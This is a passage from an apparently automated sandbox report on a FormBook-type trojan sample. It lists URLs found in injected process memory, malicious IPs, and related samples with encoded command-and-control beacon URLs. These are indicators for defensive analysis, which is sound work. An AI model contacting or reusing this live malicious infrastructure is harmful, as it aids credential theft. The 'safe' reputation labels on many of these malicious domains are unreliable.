                                            http://www.gb-electric-wheelchairs-8j.bond/ts59/www.76466.clubexplorer.exe, 00000003.00000003.2292081918.000000000C29F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3088485333.000000000C29F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3886713594.000000000C29F000.00000004.00000001.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            https://word.office.comexplorer.exe, 00000003.00000002.3885261844.000000000BDFE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2292171112.000000000BDFE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1440884138.000000000BDFE000.00000004.00000001.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://www.ec-delivery-jobs-8j.bondexplorer.exe, 00000003.00000003.2292081918.000000000C29F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3088485333.000000000C29F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3886713594.000000000C29F000.00000004.00000001.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://www.topallinoneaccounting.com/ts59/www.zangbreaker.comexplorer.exe, 00000003.00000003.2292081918.000000000C29F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3088485333.000000000C29F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3886713594.000000000C29F000.00000004.00000001.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://www.checkout4xgrow.shop/ts59/explorer.exe, 00000003.00000003.2292081918.000000000C29F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3088485333.000000000C29F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3886713594.000000000C29F000.00000004.00000001.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://www.ujgddhhfeffsfgg2.groupReferer:explorer.exe, 00000003.00000003.2292081918.000000000C29F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3088485333.000000000C29F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3886713594.000000000C29F000.00000004.00000001.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earningsexplorer.exe, 00000003.00000002.3879471360.0000000007058000.00000004.00000001.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://www.topallinoneaccounting.comexplorer.exe, 00000003.00000003.2292081918.000000000C29F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3088485333.000000000C29F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3886713594.000000000C29F000.00000004.00000001.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://www.zu89.topexplorer.exe, 00000003.00000003.2292081918.000000000C29F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3088485333.000000000C29F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3886713594.000000000C29F000.00000004.00000001.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://www.momura.xyzexplorer.exe, 00000003.00000003.2292081918.000000000C29F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3088485333.000000000C29F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3886713594.000000000C29F000.00000004.00000001.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://www.00050516.xyz/ts59/explorer.exe, 00000003.00000003.2292081918.000000000C29F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3088485333.000000000C29F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3886713594.000000000C29F000.00000004.00000001.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            https://android.notify.windows.com/iOSJMexplorer.exe, 00000003.00000002.3885261844.000000000BDFE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2292171112.000000000BDFE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1440884138.000000000BDFE000.00000004.00000001.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNewexplorer.exe, 00000003.00000003.3083765544.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1436716038.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3879471360.0000000007058000.00000004.00000001.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gPi8-darkexplorer.exe, 00000003.00000003.3083765544.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1436716038.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3879471360.0000000007058000.00000004.00000001.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            https://outlook.comexplorer.exe, 00000003.00000002.3885261844.000000000BDFE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2292171112.000000000BDFE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1440884138.000000000BDFE000.00000004.00000001.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://www.modleavedepts.onlineReferer:explorer.exe, 00000003.00000003.2292081918.000000000C29F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3088485333.000000000C29F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3886713594.000000000C29F000.00000004.00000001.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://www.babyscan.xyzexplorer.exe, 00000003.00000003.2292081918.000000000C29F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3088485333.000000000C29F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3886713594.000000000C29F000.00000004.00000001.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            https://android.notify.windows.com/iOSZMexplorer.exe, 00000003.00000002.3885261844.000000000BDFE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2292171112.000000000BDFE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1440884138.000000000BDFE000.00000004.00000001.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://www.zu89.top/ts59/explorer.exe, 00000003.00000002.3886713594.000000000C29F000.00000004.00000001.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: malware
                                            		unknown
                                            http://www.bvlazaedi.xyz/ts59/www.babyscan.xyzexplorer.exe, 00000003.00000003.2292081918.000000000C29F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3088485333.000000000C29F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3886713594.000000000C29F000.00000004.00000001.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            https://android.notify.windows.com/iOSexplorer.exe, 00000003.00000002.3885261844.000000000BDFE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2292171112.000000000BDFE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1440884138.000000000BDFE000.00000004.00000001.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            		unknown
                                            https://www.yelp.comexplorer.exe, 00000003.00000003.3083765544.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1436716038.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3879471360.0000000007058000.00000004.00000001.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            https://www.msn.com/en-us/news/us/dumb-and-dumber-12-states-with-the-absolute-worst-education-in-theexplorer.exe, 00000003.00000003.3083765544.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1436716038.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3879471360.0000000007058000.00000004.00000001.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://www.76466.club/ts59/explorer.exe, 00000003.00000003.2292081918.000000000C29F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3088485333.000000000C29F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3886713594.000000000C29F000.00000004.00000001.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/MostlyClearNight.svgexplorer.exe, 00000003.00000002.3879471360.0000000007058000.00000004.00000001.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://www.bvlazaedi.xyz/ts59/explorer.exe, 00000003.00000003.2292081918.000000000C29F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3088485333.000000000C29F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3886713594.000000000C29F000.00000004.00000001.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            https://www.msn.com/en-us/news/politics/kevin-mccarthy-s-ouster-as-house-speaker-could-cost-gop-its-explorer.exe, 00000003.00000003.3083765544.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1436716038.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3879471360.0000000007058000.00000004.00000001.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gKhb-darkexplorer.exe, 00000003.00000003.3083765544.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1436716038.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3879471360.0000000007058000.00000004.00000001.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            https://api.msn.com/v1/news/Feed/Windows?z$explorer.exe, 00000003.00000002.3881532572.0000000008685000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1438602211.0000000008685000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3086041137.0000000008685000.00000004.00000001.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gPfv-darkexplorer.exe, 00000003.00000003.3083765544.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1436716038.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3879471360.0000000007058000.00000004.00000001.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://www.momura.xyzReferer:explorer.exe, 00000003.00000003.2292081918.000000000C29F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3088485333.000000000C29F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3886713594.000000000C29F000.00000004.00000001.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://www.76466.clubexplorer.exe, 00000003.00000003.2292081918.000000000C29F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3088485333.000000000C29F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3886713594.000000000C29F000.00000004.00000001.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            https://www.msn.com/en-us/lifestyle/lifestyle-buzz/what-to-do-if-a-worst-case-nuclear-scenario-actuaexplorer.exe, 00000003.00000003.3083765544.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1436716038.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3879471360.0000000007058000.00000004.00000001.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://www.babyscan.xyz/ts59/www.gb-electric-wheelchairs-8j.bondexplorer.exe, 00000003.00000003.2292081918.000000000C29F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3088485333.000000000C29F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3886713594.000000000C29F000.00000004.00000001.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            https://www.msn.com/en-us/news/world/a-second-war-could-easily-erupt-in-europe-while-everyone-s-distexplorer.exe, 00000003.00000003.3083765544.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1436716038.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3879471360.0000000007058000.00000004.00000001.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://www.kgstrengthandperformance.com/ts59/www.bvlazaedi.xyzexplorer.exe, 00000003.00000003.2292081918.000000000C29F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3088485333.000000000C29F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3886713594.000000000C29F000.00000004.00000001.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://www.ec-delivery-jobs-8j.bond/ts59/www.zu89.topexplorer.exe, 00000003.00000003.2292081918.000000000C29F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3088485333.000000000C29F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3886713594.000000000C29F000.00000004.00000001.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            https://www.msn.com/en-us/weather/topstories/first-map-of-earth-s-lost-continent-has-been-published/explorer.exe, 00000003.00000003.3083765544.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1436716038.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3879471360.0000000007058000.00000004.00000001.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://www.checkout4xgrow.shop/ts59/www.kgstrengthandperformance.comexplorer.exe, 00000003.00000003.2292081918.000000000C29F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3088485333.000000000C29F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3886713594.000000000C29F000.00000004.00000001.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://schemas.microexplorer.exe, 00000003.00000000.1438329693.00000000082D0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.1437589686.0000000007670000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000002.3877014382.0000000002C60000.00000002.00000001.00040000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            		unknown
                                            https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Teaser/recordhigh.svgexplorer.exe, 00000003.00000003.3083765544.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1436716038.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3879471360.0000000007058000.00000004.00000001.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            https://parade.com/61481/toriavey/where-did-hamburgers-originateexplorer.exe, 00000003.00000003.3083765544.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1436716038.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3879471360.0000000007058000.00000004.00000001.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://www.00050516.xyzReferer:explorer.exe, 00000003.00000003.2292081918.000000000C29F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3088485333.000000000C29F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3886713594.000000000C29F000.00000004.00000001.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            https://octagonal-waiter-408.notion.site/Notion-publish-test-5ffca584256043babdad0fd9159cb223?pvs=4systray.exe, 00000004.00000002.3877340789.000000000574F000.00000004.10000000.00040000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://www.zangbreaker.com/ts59/explorer.exe, 00000003.00000003.2292081918.000000000C29F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3088485333.000000000C29F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3886713594.000000000C29F000.00000004.00000001.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://www.momura.xyz/ts59/explorer.exe, 00000003.00000003.2292081918.000000000C29F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3088485333.000000000C29F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3886713594.000000000C29F000.00000004.00000001.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            https://www.msn.com/en-us/news/technology/prehistoric-comet-impacted-earth-and-triggered-the-switch-explorer.exe, 00000003.00000003.3083765544.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1436716038.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3879471360.0000000007058000.00000004.00000001.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            https://api.msn.com/~Texplorer.exe, 00000003.00000003.3086041137.0000000008796000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1438602211.0000000008796000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3881532572.0000000008796000.00000004.00000001.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNewexplorer.exe, 00000003.00000003.3083765544.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1436716038.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3879471360.0000000007058000.00000004.00000001.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://www.texhio.online/ts59/explorer.exe, 00000003.00000003.2292081918.000000000C29F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3088485333.000000000C29F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3886713594.000000000C29F000.00000004.00000001.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://www.76466.club/ts59/www.ujgddhhfeffsfgg2.groupexplorer.exe, 00000003.00000003.2292081918.000000000C29F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3088485333.000000000C29F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3886713594.000000000C29F000.00000004.00000001.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://www.ujgddhhfeffsfgg2.groupexplorer.exe, 00000003.00000003.2292081918.000000000C29F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3088485333.000000000C29F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3886713594.000000000C29F000.00000004.00000001.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gKhbexplorer.exe, 00000003.00000003.3083765544.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1436716038.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3879471360.0000000007058000.00000004.00000001.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://www.momura.xyz/ts59/www.gas39.proexplorer.exe, 00000003.00000003.2292081918.000000000C29F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3088485333.000000000C29F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3886713594.000000000C29F000.00000004.00000001.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://www.topallinoneaccounting.comReferer:explorer.exe, 00000003.00000003.2292081918.000000000C29F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3088485333.000000000C29F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3886713594.000000000C29F000.00000004.00000001.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://www.modleavedepts.online/ts59/explorer.exe, 00000003.00000003.2292081918.000000000C29F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3088485333.000000000C29F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3886713594.000000000C29F000.00000004.00000001.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            https://www.msn.com/en-us/news/politics/here-s-what-house-rules-say-about-trump-serving-as-speaker-oexplorer.exe, 00000003.00000003.3083765544.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1436716038.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3879471360.0000000007058000.00000004.00000001.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            https://www.msn.com/en-us/weather/topstories/stop-planting-new-forests-scientists-say/ar-AA1hFI09explorer.exe, 00000003.00000003.3083765544.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1436716038.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3879471360.0000000007058000.00000004.00000001.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            https://www.msn.com/en-us/money/personalfinance/the-no-1-phrase-people-who-are-good-at-small-talk-alexplorer.exe, 00000003.00000003.3083765544.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1436716038.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3879471360.0000000007058000.00000004.00000001.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://www.zangbreaker.com/ts59/www.texhio.onlineexplorer.exe, 00000003.00000003.2292081918.000000000C29F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3088485333.000000000C29F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3886713594.000000000C29F000.00000004.00000001.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown

                                            World Map of Contacted IPs

                                            • No. of IPs < 25%
                                            • 25% < No. of IPs < 50%
                                            • 50% < No. of IPs < 75%
                                            • 75% < No. of IPs

                                            Public IPs

                                            IPDomainCountryFlagASNASN NameMalicious
                                            194.41.37.158
                                            		gt.huhusddfnsuegcdn.comunknown
                                            		133199SONDERCLOUDLIMITED-AS-APSonderCloudLimitedHKtrue
                                            185.53.179.91
                                            		www.gb-electric-wheelchairs-8j.bondGermany
                                            		61969TEAMINTERNET-ASDEtrue
                                            188.114.97.3
                                            		www.checkout4xgrow.shopEuropean Union
                                            		13335CLOUDFLARENETUStrue
                                            76.223.105.230
                                            		kgstrengthandperformance.comUnited States
                                            		16509AMAZON-02UStrue
                                            3.64.163.50
                                            		www.babyscan.xyzUnited States
                                            		16509AMAZON-02UStrue

                                            General Information

                                            Joe Sandbox version:40.0.0 Tourmaline
                                            Analysis ID:1467059
                                            Start date and time:2024-07-03 17:24:14 +02:00
                                            Joe Sandbox product:CloudBasic
                                            Overall analysis duration:0h 11m 41s
                                            Hypervisor based Inspection enabled:false
                                            Report type:full
                                            Cookbook file name:default.jbs
                                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                            Number of analysed new started processes analysed:9
                                            Number of new started drivers analysed:0
                                            Number of existing processes analysed:0
                                            Number of existing drivers analysed:0
                                            Number of injected processes analysed:1
                                            Technologies:
                                            • HCA enabled
                                            • EGA enabled
                                            • AMSI enabled
                                            Analysis Mode:default
                                            Sample name:MKCC-MEC-RFQ-115-2024.exe
                                            Detection:MAL
                                            Classification:mal100.troj.evad.winEXE@8/4@12/5
                                            EGA Information:
                                            • Successful, ratio: 100%
                                            HCA Information:
                                            • Successful, ratio: 100%
                                            • Number of executed functions: 59
                                            • Number of non-executed functions: 277
                                            Cookbook Comments:
                                            • Found application associated with file extension: .exe
                                            • Override analysis time to 240000 for current running targets taking high CPU consumption

                                            Warnings

                                            • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, SIHClient.exe, conhost.exe
                                            • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                            • Not all processes where analyzed, report is missing behavior information
                                            • Report creation exceeded maximum time and may have missing disassembly code information.
                                            • Report size exceeded maximum capacity and may have missing disassembly code.
                                            • Report size getting too big, too many NtEnumerateKey calls found.
                                            • Report size getting too big, too many NtOpenKey calls found.
                                            • Report size getting too big, too many NtOpenKeyEx calls found.
                                            • Report size getting too big, too many NtQueryValueKey calls found.
                                            • VT rate limit hit for: MKCC-MEC-RFQ-115-2024.exe

                                            Simulations

                                            Behavior and APIs

                                            TimeTypeDescription
                                            11:25:26API Interceptor7991644x Sleep call for process: explorer.exe modified
                                            11:26:00API Interceptor7280128x Sleep call for process: systray.exe modified

                                            Joe Sandbox View / Context

                                            IPs

                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                            185.53.179.912024 Lusail Fence-WITH STICKER-2-003.exeGet hashmaliciousFormBookBrowse
                                            • www.gb-electric-wheelchairs-8j.bond/ts59/?7n=mB8uG6w8zpafFuNLwvQmLBNoWWmhhT+Pa5pMyx7Kkg5PpWq+xUX3NBFKVo2JmSZYGQcG7mEBYw==&2d8=3fe8kxnx8zVX-2L
                                            RFQINL0607_Commerical_list.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                            • www.pingpongtable-sg.bond/fg83/?IpZXsVy=vgcZVq2vlo6tIZLwBMCb9IR7Fd0F2pwxk1GGseMFxnAAiVZXKfn9ZK8RnpW3pp9l3vJN&kxopsN=MlyXbd0X
                                            Scan_Doc.vbsGet hashmaliciousFormBookBrowse
                                            • www.hyperpigmentation-91528.bond/g94s/?DrKTC2=LjGd&e8a=tzSFV3H7hErTYvWZwPPC/GAyGN0rrg2x5F2fwYgRRUbDdRuSW2XehEr5Lw08uOFm07l+
                                            E-dekont_pdf.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                            • www.credit-cards-54889.com/mi94/?7n-Lh=wX1E+PP8GJLUwW4mj+Nza6lWe8cbBzPUrOMOJyU3aq2wOfqE4jFrkNQnwJ4n6caLvu5m&7nrLOp=h2JXJD
                                            ekstre_pdf.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                            • www.credit-cards-54889.com/mi94/?_N6l56=wX1E+PP8GJLUwW4mj+Nza6lWe8cbBzPUrOMOJyU3aq2wOfqE4jFrkNQnwJ4n6caLvu5m&3fK0g=JxoL4
                                            ekstre.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                            • www.credit-cards-54889.com/mi94/?iN64=wX1E+PP8GJLUwW4mj+Nza6lWe8cbBzPUrOMOJyU3aq2wOfqE4jFrkNQnwJ4n6caLvu5m&7ncHc8=Tv6lQt-XnpBl3ra
                                            ekstre.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                            • www.credit-cards-54889.com/mi94/?-Z=6lfDx&5jbDpbb=wX1E+PP8GJLUwW4mj+Nza6lWe8cbBzPUrOMOJyU3aq2wOfqE4jFrkNQnwJ4n6caLvu5m
                                            E-DEKONT_pdf.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                            • www.credit-cards-54889.com/mi94/?YtxdA=ClrLPvDXABoDT8&uZgtA=wX1E+PP8GJLUwW4mj+Nza6lWe8cbBzPUrOMOJyU3aq2wOfqE4jFrkNQnwJ4n6caLvu5m
                                            Ziraat_Bankasi_Swift_Mesaji.exeGet hashmaliciousFormBook, GuLoaderBrowse
